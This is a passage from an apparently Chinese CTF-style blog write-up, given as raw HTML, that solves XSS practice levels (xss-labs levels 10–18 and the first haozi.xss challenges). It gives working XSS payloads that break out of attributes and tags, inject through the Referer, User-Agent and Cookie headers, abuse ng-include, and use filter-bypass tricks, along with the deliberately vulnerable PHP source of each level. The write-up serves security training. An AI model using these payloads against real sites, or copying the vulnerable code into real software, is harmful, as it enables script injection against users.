class="literal">false</span>===<span class="title function_ invoke__">strpos</span>(<span class="variable">$str7</span>,<span class="string">'http://'</span>))</span><br><span class="line">{</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>'</span>;</span><br><span class="line"> }</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">{</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<center><BR><a href="'</span>.<span class="variable">$str7</span>.<span class="string">'">友情链接</a></center>'</span>;</span><br><span class="line">}</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 10</p> <p>测试第一个标签处,发现全都被过滤</p> <p><a href="https://img-blog.csdnimg.cn/cac51a8eb6fd47de8782e2b57d225cf8.png"><img lazyload alt="image" data-src="https://img-blog.csdnimg.cn/cac51a8eb6fd47de8782e2b57d225cf8.png" alt="img" ></a></p> <p>只能从源代码中的三个hidden元素入手,进行传值测试后发现t_sort有回显(GET),其余两个猜测为POST型</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202155934507.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240202155934507.png" alt="image-20240202155934507" ></a></p> <p><strong>答案:<code>?t_sort=" onfocus=javascript:alert() type="text//</code></strong> ,因为此处输入框被隐藏,需要添加type=“text”,或者在控制台内修改此处的hidden为button等。</p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="variable">$_GET</span>[<span class="string">"keyword"</span>];</span><br><span class="line"><span class="variable">$str11</span> = <span class="variable">$_GET</span>[<span class="string">"t_sort"</span>];</span><br><span class="line"><span class="variable">$str22</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">">"</span>,<span class="string">""</span>,<span class="variable">$str11</span>);</span><br><span class="line"><span class="variable">$str33</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"<"</span>,<span class="string">""</span>,<span class="variable">$str22</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form id=search></span></span><br><span class="line"><span class="string"><input name="t_link" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_history" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_sort" value="'</span>.<span class="variable">$str33</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><center><img src=level10.png></center></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h3 align=center>payload的长度:"</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$str</span>).<span class="string">"</h3>"</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 11</p> <p>查看网页源代码发现有四个hidden,分别尝试传值发现t_sort有回显,但几乎所有方法都被过滤,猜测t_ref为Referer头</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204135104746.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204135104746.png" alt="image-20240204135104746" ></a></p> <p>BP抓包向Referer头填充数值1即可发现回显在t_ref内,可以在Referer头内构造Payload,相应包正确后在抓到的包内添加Referer头并放包即可。</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204135754206.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204135754206.png" alt="image-20240204135754206" ></a></p> <p><strong>答案:<code>Referer: " onclick="alert(1)" type="true</code></strong></p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><!DOCTYPE html><!--STATUS OK--><html></span><br><span class="line"><head></span><br><span class="line"><meta http-equiv=<span class="string">"content-type"</span> content=<span class="string">"text/html;charset=utf-8"</span>></span><br><span class="line"><script></span><br><span class="line">window.alert = <span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span></span><br><span class="line"><span class="function"></span>{ </span><br><span class="line"><span class="title function_ invoke__">confirm</span>(<span class="string">"完成的不错!"</span>);</span><br><span class="line"> window.location.href=<span class="string">"level12.php?keyword=good job!"</span>; </span><br><span class="line">}</span><br><span class="line"></script></span><br><span class="line"><title>欢迎来到level11</title></span><br><span class="line"></head></span><br><span class="line"><body></span><br><span class="line"><h1 align=center>欢迎来到level11</h1></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="variable">$_GET</span>[<span class="string">"keyword"</span>];</span><br><span class="line"><span class="variable">$str00</span> = <span class="variable">$_GET</span>[<span class="string">"t_sort"</span>];</span><br><span class="line"><span class="variable">$str11</span>=<span class="variable">$_SERVER</span>[<span class="string">'HTTP_REFERER'</span>];</span><br><span class="line"><span class="variable">$str22</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">">"</span>,<span class="string">""</span>,<span class="variable">$str11</span>);</span><br><span class="line"><span class="variable">$str33</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"<"</span>,<span class="string">""</span>,<span class="variable">$str22</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form id=search></span></span><br><span class="line"><span class="string"><input name="t_link" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_history" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_sort" value="'</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str00</span>).<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_ref" value="'</span>.<span class="variable">$str33</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><center><img src=level11.png></center></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h3 align=center>payload的长度:"</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$str</span>).<span class="string">"</h3>"</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"></body></span><br><span class="line"></html></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 12</p> <p>与11题原理相同,注入点在UA头</p> <p><strong>答案:<code>User-Agent: " onclick="alert(1)" type="true</code></strong></p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><!DOCTYPE html><!--STATUS OK--><html></span><br><span class="line"><head></span><br><span class="line"><meta http-equiv=<span class="string">"content-type"</span> content=<span class="string">"text/html;charset=utf-8"</span>></span><br><span class="line"><script></span><br><span class="line">window.alert = <span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span></span><br><span class="line"><span class="function"></span>{ </span><br><span class="line"><span class="title function_ invoke__">confirm</span>(<span class="string">"完成的不错!"</span>);</span><br><span class="line"> window.location.href=<span class="string">"level13.php?keyword=good job!"</span>; </span><br><span class="line">}</span><br><span class="line"></script></span><br><span class="line"><title>欢迎来到level12</title></span><br><span class="line"></head></span><br><span class="line"><body></span><br><span class="line"><h1 align=center>欢迎来到level12</h1></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="variable">$_GET</span>[<span class="string">"keyword"</span>];</span><br><span class="line"><span class="variable">$str00</span> = <span class="variable">$_GET</span>[<span class="string">"t_sort"</span>];</span><br><span class="line"><span class="variable">$str11</span>=<span class="variable">$_SERVER</span>[<span class="string">'HTTP_USER_AGENT'</span>];</span><br><span class="line"><span class="variable">$str22</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">">"</span>,<span class="string">""</span>,<span class="variable">$str11</span>);</span><br><span class="line"><span class="variable">$str33</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"<"</span>,<span class="string">""</span>,<span class="variable">$str22</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form id=search></span></span><br><span class="line"><span class="string"><input name="t_link" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_history" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_sort" value="'</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str00</span>).<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_ua" value="'</span>.<span class="variable">$str33</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><center><img src=level12.png></center></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h3 align=center>payload的长度:"</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$str</span>).<span class="string">"</h3>"</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"></body></span><br><span class="line"></html></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 13</p> <p>原理与11题一样,注入点在Cookie,注意要触发cookie</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204140248710.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204140248710.png" alt="image-20240204140248710" ></a></p> <p><strong>答案:<code>Cookie: user=" onclick="alert(1)" type="true</code></strong></p> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><!DOCTYPE html><!--STATUS OK--><html></span><br><span class="line"><head></span><br><span class="line"><meta http-equiv=<span class="string">"content-type"</span> content=<span class="string">"text/html;charset=utf-8"</span>></span><br><span class="line"><script></span><br><span class="line">window.alert = <span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span></span><br><span class="line"><span class="function"></span>{ </span><br><span class="line"><span class="title function_ invoke__">confirm</span>(<span class="string">"完成的不错!"</span>);</span><br><span class="line"> window.location.href=<span class="string">"level14.php"</span>; </span><br><span class="line">}</span><br><span class="line"></script></span><br><span class="line"><title>欢迎来到level13</title></span><br><span class="line"></head></span><br><span class="line"><body></span><br><span class="line"><h1 align=center>欢迎来到level13</h1></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">setcookie</span>(<span class="string">"user"</span>, <span class="string">"call me maybe?"</span>, <span class="title function_ invoke__">time</span>()+<span class="number">3600</span>);</span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="variable">$_GET</span>[<span class="string">"keyword"</span>];</span><br><span class="line"><span class="variable">$str00</span> = <span class="variable">$_GET</span>[<span class="string">"t_sort"</span>];</span><br><span class="line"><span class="variable">$str11</span>=<span class="variable">$_COOKIE</span>[<span class="string">"user"</span>];</span><br><span class="line"><span class="variable">$str22</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">">"</span>,<span class="string">""</span>,<span class="variable">$str11</span>);</span><br><span class="line"><span class="variable">$str33</span>=<span class="title function_ invoke__">str_replace</span>(<span class="string">"<"</span>,<span class="string">""</span>,<span class="variable">$str22</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h2 align=center>没有找到和"</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">"相关的结果.</h2>"</span>.<span class="string">'<center></span></span><br><span class="line"><span class="string"><form id=search></span></span><br><span class="line"><span class="string"><input name="t_link" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_history" value="'</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_sort" value="'</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str00</span>).<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"><input name="t_cook" value="'</span>.<span class="variable">$str33</span>.<span class="string">'" type="hidden"></span></span><br><span class="line"><span class="string"></form></span></span><br><span class="line"><span class="string"></center>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><center><img src=level13.png></center></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="keyword">echo</span> <span class="string">"<h3 align=center>payload的长度:"</span>.<span class="title function_ invoke__">strlen</span>(<span class="variable">$str</span>).<span class="string">"</h3>"</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"></body></span><br><span class="line"></html></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 14</p> <p>本题环境出现问题,略(Windows服务器下无法复现)</p> </li> <li> <p>Level 15</p> <p>本题考查ng-include函数的使用</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204140554202.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204140554202.png" alt="image-20240204140554202" ></a></p> <p><strong>答案:<code>src='level1.php?name=<script>alert(1)</script>'</code></strong></p> <ul> <li> <p><code>ng-include</code>是AngularJS框架中的一个指令(directive)。</p> <p><code>ng-include</code>用于在AngularJS应用中包含外部的HTML文件或其他AngularJS模板。<strong>引入AngularJS库:</strong> 确保在你的HTML文件中引入了AngularJS库。</p> <ol> <li> <pre><code class="language-html"><script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.8.0/angular.min.js"></script> XML2. **创建AngularJS应用:** 在HTML文件中定义一个AngularJS应用。 ```html <div ng-app="myApp"> <!-- 应用内容将在这里 --> </div> <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">2. **使用`ng-include`指令:** 在需要包含外部内容的地方使用`ng-include`指令,并指定要包含的文件路径。</span><br><span class="line"></span><br><span class="line"> ```html</span><br><span class="line"> <div ng-include="'path/to/your/template.html'"></div></span><br></pre></td></tr></table></figure> 注意:单引号内的路径可以是相对路径或绝对路径。 </code></pre> </li> <li> <p><strong>定义AngularJS模块和控制器:</strong> 在JavaScript中定义AngularJS模块和控制器,并将其与应用相关联。</p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">script</span>></span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"> <span class="keyword">var</span> app = angular.<span class="title function_">module</span>(<span class="string">'myApp'</span>, []);</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"> app.<span class="title function_">controller</span>(<span class="string">'myController'</span>, <span class="keyword">function</span>(<span class="params">$scope</span>) {</span></span><br><span class="line"><span class="language-javascript"> <span class="comment">// 控制器逻辑</span></span></span><br><span class="line"><span class="language-javascript"> });</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag"></<span class="name">script</span>></span></span><br></pre></td></tr></table></figure> </li> <li> <p><strong>关联控制器和<code>ng-include</code>:</strong> 在包含<code>ng-include</code>的元素中使用<code>ng-controller</code>来关联控制器。</p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">div</span> <span class="attr">ng-controller</span>=<span class="string">"myController"</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">div</span> <span class="attr">ng-include</span>=<span class="string">"'path/to/your/template.html'"</span>></span><span class="tag"></<span class="name">div</span>></span></span><br><span class="line"><span class="tag"></<span class="name">div</span>></span></span><br></pre></td></tr></table></figure> </li> </ol> <p>这样,<code>ng-include</code>指令就会加载指定的HTML文件或AngularJS模板,并将其内容包含在应用中。这是一种实现模块化和代码重用的方式,特别适用于大型AngularJS应用。</p> </li> </ul> <p>源代码:</p> <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><html ng-app></span><br><span class="line"><head></span><br><span class="line"> <meta charset=<span class="string">"utf-8"</span>></span><br><span class="line"> <script src=<span class="string">"angular.min.js"</span>></script></span><br><span class="line"><script></span><br><span class="line">window.alert = <span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span></span><br><span class="line"><span class="function"></span>{ </span><br><span class="line"><span class="title function_ invoke__">confirm</span>(<span class="string">"完成的不错!"</span>);</span><br><span class="line"> window.location.href=<span class="string">"level16.php?keyword=test"</span>; </span><br><span class="line">}</span><br><span class="line"></script></span><br><span class="line"><title>欢迎来到level15</title></span><br><span class="line"></head></span><br><span class="line"><h1 align=center>欢迎来到第<span class="number">15</span>关,自己想个办法走出去吧!</h1></span><br><span class="line"><p align=center><img src=level15.png></p></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">"display_errors"</span>, <span class="number">0</span>);</span><br><span class="line"><span class="variable">$str</span> = <span class="variable">$_GET</span>[<span class="string">"src"</span>];</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'<body><span class="ng-include:'</span>.<span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$str</span>).<span class="string">'"></span></body>'</span>;</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 16</p> <p>本题在<center>标签内,根据后面的<img>标签提示,我们可以构造一个img标签</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204141319824.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204141319824.png" alt="image-20240204141319824" ></a></p> <p>经过尝试发现过滤了空格,我们可以用<code>%0A</code>换行符绕过空格</p> <p><strong>答案:<code>keyword=<img%0Asrc=1%0Aonclick="alert(1)"></code></strong></p> <p>答案实际形式:</p> <figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">keyword=<img</span><br><span class="line">src=1</span><br><span class="line">onclick="alert(1)"></span><br></pre></td></tr></table></figure> <p>源代码:</p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><!DOCTYPE <span class="keyword">html</span>></span><span class="comment"><!--STATUS OK--></span><span class="tag"><<span class="name">html</span>></span></span><br><span class="line"><span class="tag"><<span class="name">head</span>></span></span><br><span class="line"><span class="tag"><<span class="name">meta</span> <span class="attr">http-equiv</span>=<span class="string">"content-type"</span> <span class="attr">content</span>=<span class="string">"text/html;charset=utf-8"</span>></span></span><br><span class="line"><span class="tag"><<span class="name">script</span>></span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"><span class="variable language_">window</span>.<span class="property">alert</span> = <span class="keyword">function</span>(<span class="params"></span>) </span></span><br><span class="line"><span class="language-javascript">{ </span></span><br><span class="line"><span class="language-javascript"><span class="title function_">confirm</span>(<span class="string">"完成的不错!"</span>);</span></span><br><span class="line"><span class="language-javascript"> <span class="variable language_">window</span>.<span class="property">location</span>.<span class="property">href</span>=<span class="string">"level17.php?arg01=a&arg02=b"</span>; </span></span><br><span class="line"><span class="language-javascript">}</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag"></<span class="name">script</span>></span></span><br><span class="line"><span class="tag"><<span class="name">title</span>></span>欢迎来到level16<span class="tag"></<span class="name">title</span>></span></span><br><span class="line"><span class="tag"></<span class="name">head</span>></span></span><br><span class="line"><span class="tag"><<span class="name">body</span>></span></span><br><span class="line"><span class="tag"><<span class="name">h1</span> <span class="attr">align</span>=<span class="string">center</span>></span>欢迎来到level16<span class="tag"></<span class="name">h1</span>></span></span><br><span class="line"><span class="meta"><?php </span></span><br><span class="line"><span class="meta">ini_set("display_errors", 0);</span></span><br><span class="line"><span class="meta">$str = strtolower($_GET["keyword"]);</span></span><br><span class="line"><span class="meta">$str2=str_replace("script","&nbsp;",$str);</span></span><br><span class="line"><span class="meta">$str3=str_replace(" ","&nbsp;",$str2);</span></span><br><span class="line"><span class="meta">$str4=str_replace("/","&nbsp;",$str3);</span></span><br><span class="line"><span class="meta">$str5=str_replace(" ","&nbsp;",$str4);</span></span><br><span class="line"><span class="meta">echo "<center>".$str5."</center>";</span></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="tag"><<span class="name">center</span>></span><span class="tag"><<span class="name">img</span> <span class="attr">src</span>=<span class="string">level16.png</span>></span><span class="tag"></<span class="name">center</span>></span></span><br><span class="line"><span class="meta"><?php </span></span><br><span class="line"><span class="meta">echo "<h3 align=center>payload的长度:".strlen($str5)."</h3>";</span></span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="tag"></<span class="name">body</span>></span></span><br><span class="line"><span class="tag"></<span class="name">html</span>></span></span><br></pre></td></tr></table></figure> </li> <li> <p>Level 17</p> <p>查看网页源代码可知有两个参数arg01和arg02,进行尝试后发现会拼接在<embed>标签内,有src属性</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204142001519.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204142001519.png" alt="image-20240204142001519" ></a></p> <p>可以构造以下payload</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204142237099.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204142237099.png" alt="image-20240204142237099" ></a></p> <p><strong>答案:<code>arg01=a&arg02= onMouseOver=alert(1)</code></strong></p> </li> <li> <p>Level 18</p> <p>本题与17题一致,payload相同</p> </li> </ul> <h3 id="haozi-xss题解">haozi.xss题解</h3> <p>网址: <a class="link" href="https://xss.haozi.me/" >https://xss.haozi.me/<i class="fas fa-external-link-alt"></i></a></p> <ul> <li> <h4 id="0x00">0x00</h4> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204143959934.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204143959934.png" alt="image-20240204143959934" ></a></p> </li> </ul> <p><strong>答案:<code><script>alert(1)</script></code></strong></p> <ul> <li> <h4 id="0x01">0x01</h4> <p>注入点在<textarea></textarea>标签中,故按照0x00的方法无法被解析,可提前闭合标签。</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204144343303.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204144343303.png" alt="image-20240204144343303" ></a></p> <p><strong>答案:<code></textarea><script>alert(1)</script></code></strong></p> <p>也可以利用error事件:<code></textarea><img src="" onerror=alert(1)></code>,由于src是空,所以肯定会报错,,故通过错误调用事件成功注入</p> </li> <li> <h4 id="0x02">0x02</h4> <p>本题input标签内的value会将值转化为字符串,然后显示在输入框内,故前两题的标签闭合注入会失效,可以借鉴SQL注入的方法,将前面的双引号闭合,然后注入新的标签</p> <p>答案:<code>" > <script>alert(1)</script></code></p> <p>也可以使用onclick事件:</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204144832842.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204144832842.png" alt="image-20240204144832842" ></a></p> <p><strong>答案:<code>" onclick="alert(1)</code></strong></p> </li> <li> <h4 id="0x03">0x03</h4> <p>过滤符号:<code>() <></code> ,在JavaScript中可以使用反引号`` <code>来代替</code>()`</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204150455947.png"><img lazyload alt="image" data-src="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204150455947.png" alt="image-20240204150455947" ></a></p> <p><strong>答案:<code><script>alert</code>1<code></script></code></strong></p> <p>或:</p> <figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">a</span> <span class="attr">href</span>=<span class="string">javascript:alert</span>`<span class="attr">1</span>\`></span>123<span class="tag"></<span class="name">a</span>></span></span><br></pre></td></tr></table></figure> </li> <li> <h4 id="0x04">0x04</h4> <p>过滤符号:小括号(),中括号[],反引号` 可使用HTML实体编码绕过</p> <p><a href="https://c3ngh-blog.oss-cn-hangzhou.aliyuncs.com/img/image-20240204151017389.png"><img lazyload alt="image" 